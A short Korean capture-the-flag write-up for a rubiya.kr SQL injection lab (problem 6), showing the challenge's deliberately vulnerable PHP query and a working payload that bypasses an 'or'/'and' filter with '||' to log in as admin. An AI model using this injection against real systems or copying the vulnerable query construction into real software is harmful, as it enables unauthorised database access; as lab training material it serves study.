rubiya.kr 6번

http://rubiya.kr/sqli/prob6.php

<?php 
  include "./dbconn.php"; 
  include "./solve.php"; 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe"); 
  $query = "select id from prob5 where id='guest' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysql_fetch_array(mysql_query($query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
  if($result['id'] == 'admin') solve(); 
  highlight_file(__FILE__); 
?>

pw만 GET방식으로 받는데 주의할 필터링은 or,and. 쿼리 결과값이 admin이면 통과.

or은 ||로 우회.

http://rubiya.kr/sqli/prob6.php?pw=g%27%20||%20id=%27admin

query : select id from prob5 where id='guest' and pw='g' || id='admin'